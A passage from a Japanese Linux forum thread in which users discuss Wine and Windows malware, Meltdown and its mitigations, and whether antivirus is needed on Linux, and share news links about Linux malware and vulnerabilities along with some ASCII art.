277 :login:Penguin :2022/03/21(月) 20:34:59.19 ID:uF2U5kCh.net 例えばどんな脆弱性
278 :login:Penguin :2022/03/21(月) 23:58:27.98 ID:uhwbkFCX.net >>272 この記事を今書いたらウイルス作成罪で逮捕されるよね
279 :login:Penguin :2022/03/24(木) 08:09:59.52 ID:ywqC7Lz4.net たとえばC/C++で書かれたプログラムでメモリ破壊が起きる脆弱性とかがそのまま再現されるとか Wineってサンドボックスじゃないんでしょ?
280 :login:Penguin :2022/03/24(木) 09:08:40.06 ID:ltaF4EoS.net wine自体はサンドボックスではない。 一方でwineをサンドボックスの中で実行することは可能。 一般ユーザーの権限で実行すれば一般ユーザーの触れる部分しかさわれない。 コンテナで実行すればコンテナから見える部分しか関与できない。 セキュリティ設定下で実行すれば制限された権限しか使用出来そうない。 総じて使い方次第。
281 :login:Penguin :2022/03/31(木) 02:27:55.21 ID:6gTUptRM.net メモリ破壊ってなんやねん。 wine自体の脆弱性でやられることはあっても、Windowsの脆弱性でやられることはないだろ。
282 :login:Penguin :2022/03/31(木) 03:38:11.81 ID:3Q2itE4U.net 例えば wine の中で microsoft office 動かしたとして、excel のマクロで書かれたウィルスとかは当然機能する。 アプリが乗っ取られれば meltdown ようなハードを対象とした攻撃ができる。 その他にアプリの穴をついてロボットを仕込むとかも可能。 一方で windows kernel や windows の起動システムやサービスに対する攻撃はできない。そもそんなものは存在しないので。
283 :login:Penguin :2022/03/31(木) 03:44:33.44 ID:6gTUptRM.net >>282 meltdownで何ができんのよ?
284 :login:Penguin :2022/03/31(木) 08:38:02.95 ID:8KbeFvKq.net 「meltdown」では何も出来ないとしても、 「meltdownのようなハードを対象とした攻撃」は他にもある/今後発生するかもしれないでしょ
285 :login:Penguin :2022/03/31(木) 11:16:00.89 ID:3Q2itE4U.net meltdown は権限のない場所のメモリ内容を盗み見る攻撃。ログインパスワードなどの重要情報を盗まれる可能性がある。 もちろん最新のOSを使っていれば対策されているのでできない(はず)。 一方で類似の攻撃手段は毎年のように開発されている。
286 :login:Penguin :2022/03/31(木) 13:02:29.46 ID:hrFKApv5.net カーネルでメルトダウンの対策を無効にすると30%程度パフォーマンスが上がるような記事を昔見た
287 :login:Penguin :2022/03/31(木) 13:41:31.15 ID:3Q2itE4U.net 30%はかなり大げさ。ショート・パケットで大量IOしてるようなシステムでなければ、そこまで変わらない。 普通10%くらいじゃないかな。他の攻撃への対策にもなっているので off にするのは推奨されない。
288 :login:Penguin :2022/03/31(木) 21:33:05.86 ID:6gTUptRM.net wineでexcelマクロ動かして脆弱性をついてさらにメルトダウンでって ハードル高くてほぼ不可能じゃね。
289 :login:Penguin :2022/04/15(金) 17:17:49.06 ID:qZl81aXi.net 津波がここまで来るなんてありえないんじゃね? とか思ってて東日本壊滅一歩手前だったことを もう忘れたのだろうか
290 :login:Penguin :2022/04/16(土) 02:56:12 ID:/WJtMY4I.net ま、それならドアに鍵1000個つけて暮らすといいよ。 安全だから。
291 :login:Penguin :2022/04/16(土) 05:31:13.38 ID:n2rPNAGD.net ドアに鍵1000個つけると津波がこないんだ へーすごーい それどこのカルト宗教?
292 :login:Penguin :2022/04/16(土) 06:21:24.35 ID:UdUglJWb.net 津波は例えで言ってるだけで誰もそこに言及してないんだが読解力ドベなのかな
293 :login:Penguin :2022/04/16(土) 06:47:13.85 ID:n2rPNAGD.net 「それなら」でつないでおいてその言い訳は恥ずかしくないの?
294 :login:Penguin :2022/04/16(土) 06:56:41.20 ID:9P5KPh3C.net >>289 をもう一度よく読んでみようか文盲
295 :login:Penguin :2022/04/16(土) 08:47:04.64 ID:L5OHmyPk.net 馬鹿同士仲良くしろって ま、馬鹿だからするんだろうけど・・・
296 :login:Penguin :2022/04/16(土) 10:13:31.21 ID:60ZvNABA.net 無いことを証明するのは悪魔の証明で不可能だから、普通の人は普通に考えたら現実的に起こり得ない事は「無い」って表現するけどプログラマは「無いとは言えない」って表現する みたいな冗談どっかで見たんだけどどこだったかな…
297 :login:Penguin :2022/04/17(日) 03:29:35.74 ID:d7BRhfM8.net コスト計算ができないおバカ多いよね。
298 :login:Penguin :2022/04/17(日) 10:10:38.56 ID:VG7mWIvn.net けんかをやめて 二人を止めて
299 :login:Penguin :2022/04/18(月) 17:23:14.19 ID:mAXwkcvQ.net 1月からsophosアップデート失敗してたわ
300 :login:Penguin :2022/05/02(月) 05:57:32.08 ID:v2q/MbXG.net eset nod32は今年の第3四半期に終了か
301 :login:Penguin :2022/05/13(金) 18:58:08.52 ID:G/Ft5pt5.net これLinuxに関係ある? NVD - CVE-2022-26809 https://nvd.nist.gov/vuln/detail/CVE-2022-26809
302 :login:Penguin :2022/05/18(水) 16:49:18 ID:Qx87b8Vd.net rootで使わなきゃ何とかなるっていうけど しょっちゅうパスワード求められて麻痺しちゃってるから、いざウィルスか何かがパスワード求めてきてもうっかり入れちゃいそうな気がする
303 :login:Penguin :2022/05/20(金) 20:12:55.49 ID:c+i/ftSn.net >>302 すげぇ分かる
304 :login:Penguin :2022/07/01(金) 12:14:40.96 ID:X1LGMm+v.net ランレベル3からgui起動するとモッサリ動作になるのね ランレベル5ならサクッと動く
305 :login:Penguin :2022/07/01(金) 20:19:27.91 ID:K96O39HQ.net そもそもlinuxは安全、セキュリティーソフト入れる方が危険になるわ
306 :login:Penguin :2022/07/02(土) 21:28:58.41 ID:Z/sLdlGP.net linuxにセキュリティーソフトを求める奴はlinux使わない方が身の為
307 :login:Penguin :2022/07/02(土) 21:59:28.84 ID:5BjrO4EH.net よけいなサービス、アプリを稼働させると一般にセキュリティが落ちるよ Google Chromeなんてバックグラウンドで勝手に実行するんだって
308 :login:Penguin :2022/07/03(日) 16:06:45.65 ID:djLtolpz.net クラムウィン使っとる
309 :login:Penguin :2022/07/03(日) 16:07:38.41 ID:djLtolpz.net ウィンじゃなかった
310 :login:Penguin :2022/07/05(火) 02:21:06.25 ID:6gRGIkVI.net クラムボンはわらったよ
311 :login:Penguin :2022/07/11(月) 18:34:10.16 ID:kXR8bOak.net 「Linux」マルウェア「OrBit」発見--検出、削除が難しい新種 - ZDNet Japan https://japan.zdnet.com/article/35190234/
312 :login:Penguin :2022/07/11(月) 18:52:11.08 ID:yZJnVccn.net dropperをユーザーが自分でインストールしないといけないような類の奴を過剰に騒ぐのって逆効果だよな そのせいでACEって何?RCEって何?ってレベルの馬鹿が勘違いして「Linuxでは自分で馬鹿なことしない限り安全なんですぅー!!!」みたいなイキり方しがちだし
313 :login:Penguin :2022/07/11(月) 23:53:00.18 ID:aOWuriZy.net >>311 そのマルウェアを仕込まれる条件が一番の問題だろう そいつが何ができるとか二の次
314 :login:Penguin :2022/07/12(火) 19:36:54.50 ID:g39esm2o.net 経路の例 「従業員情報が暗号化され、復号不能」 ランサムウェア「CryptXXX」攻撃受け カワムラグループ - ITmedia NEWS https://www.itmedia.co.jp/news/spv/2207/12/news106.html なんでもパッチ当たってないVPNがヤベーんだとよ
315 :login:Penguin :2022/07/12(火) 22:42:38 ID:0gQlELZD.net IPAがゼロトラストセキュリティ入門資料を公開 基礎知識や心構え、検討の流れなど解説 - ITmedia NEWS https://www.itmedia.co.jp/news/articles/2207/12/news129.html 関連情報 今更聞けない「ゼロトラストセキュリティ」の基本 具体的にはどう守る? - ITmedia NEWS https://www.itmedia.co.jp/news/articles/2010/16/news172.html
316 :login:Penguin :2022/07/12(火) 22:47:43 ID:0gQlELZD.net 悪用続く「Log4Shell」 対応放置の企業はランサムウェア感染など二次被害 「パッチ適用を怠れば、コストは増大」: この頃、セキュリティ界隈で - ITmedia NEWS https://www.itmedia.co.jp/news/spv/2207/12/news061.html
317 :login:Penguin :2022/09/12(月) 18:25:32.18 ID:QlS3Rpr8.net Powerful New Linux Malware Shikitega Uses Unusual Multi-Stage Stealth https://it.slashdot.org/story/22/09/11/0314234/powerful-new-linux-malware-shikitega-uses-unusual-multi-stage-stealth
318 :login:Penguin :2022/09/18(日) 15:34:09.33 ID:6jdCgZUV.net 不正アクセスに注意されたし inetnum: 188.115.182.0 - 188.115.185.255 netname: TENET descr: TeNeT Networking Centre descr: Odessa Ukraine
319 :login:Penguin :2022/10/10(月) 16:37:16.45 ID:0A3GS1UX.net JVNTA#96784241 VLAN対応ネットワーク機器において、L2保護機構がバイパスされる問題 https://jvn.jp/ta/JVNTA96784241/
320 :login:Penguin :2022/10/20(木) 13:37:32.96 ID:Zy5/zOs3.net メモリー上に直接マルウェアを展開する攻撃を発見--家庭用PCが標的 https://japan.zdnet.com/article/35194695/
321 :login:Penguin :2022/12/08(木) 22:21:27.92 ID:l3DluBSK.net Parrot Security https://www.parrotsec.org/download/ https://bunny.deb.parrot.sh//parrot/iso/5.1.2/Parrot-home-5.1.2_amd64.iso 5fe197d3381a4cc816eb523c32532076 Parrot-home-5.1.2_amd64.iso b04b4ea5bcbff79d5a098cd6524296a37d2f7ee7 Parrot-home-5.1.2_amd64.iso b907e0dc4ba156566471a8a271ddd575a7af2c5af4cc8bc18a949cc3 Parrot-home-5.1.2_amd64.iso 8ed307e7a135ee3bca048abf609ed8af22ecae5fb0e1c72472d39929c7cf827a Parrot-home-5.1.2_amd64.iso 34e4171853fe502b3130d0c82da5af9fd15b79b910fe9a03c83aa522eea1042d40e1ca10e294259584ab5467b8be5e33 Parrot-home-5.1.2_amd64.iso 98001b8c49f2eeb44cb354b630a43681c2c1bb6e6ad15e3c0d70fdcf8e5f85d918cd9b8afa91f546b7f93d158e98858722db17e2b7e209321dc93d2980e05cb8 Parrot-home-5.1.2_amd64.iso
322 :login:Penguin :2023/02/19(日) 19:46:37.61 ID:j798oBCu.net /^^ヽ (。・-・) ヤッホ ゚し-J (。・-・).。oO( お〜い ) ゚し-J
323 :login:Penguin :2023/04/17(月) 18:57:08.99 ID:KAmRT7oi.net (V)∧_∧(V) ヽ(・ω・)ノ フォッフォッフォッ / / ノ ̄ゝ
324 :login:Penguin :2023/04/17(月) 23:16:26.34 ID:DooHb9mZ.net 昔ESET入れたら半端無く重くなって驚いた思い出。
325 :login:Penguin :2023/05/10(水) 02:01:28.21 ID:q4Z5Qt7r.net i"\ )) | 8 ) ∧,,,∧∩-''" _ ..(´・ω・`)彡 ズロース ズロース ! ! 〃(\ ∞ ,⊂彡 `ヽ)_ノ| | し⌒J
326 :login:Penguin :2023/07/21(金) 11:38:21.39 ID:dnV52bFu.net ___ (\ ∞ ノ ヽ)_ノ 暑くても履いてくださいね〜
327 :login:Penguin :2023/09/30(土) 22:48:18.82 ID:0rNJpOGK.net (V)∧_∧(V) ヽ(・ω・)ノ ズロース フォッ ! / / ノ ̄ゝ
328 :login:Penguin :2024/01/09(火) 00:57:06.45 ID:Drc3Iy8x.net /^^ヽ (。・-・) ヤッホ ゚し-J (。・-・).。oO( お〜い ) ゚し-J
329 :login:Penguin :2024/02/14(水) 17:19:04.54 ID:WjA0v6iO.net ___ (\ ∞ ノ ヽ)_ノ
330 :login:Penguin :2024/03/14(木) 01:02:21.72 ID:CjKcJTG+.net ノ~ヽ (_∞_) ( ´・ω・) ∫ //\ ̄ ̄旦\ // ※\___\ \\ ※ ※ ※ ヽ \ヽ-―――――ヽ
107 KB
新着レスの表示
掲示板に戻る
全部
前100
次100
最新50
read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★
本文 スレッドタイトル 投稿者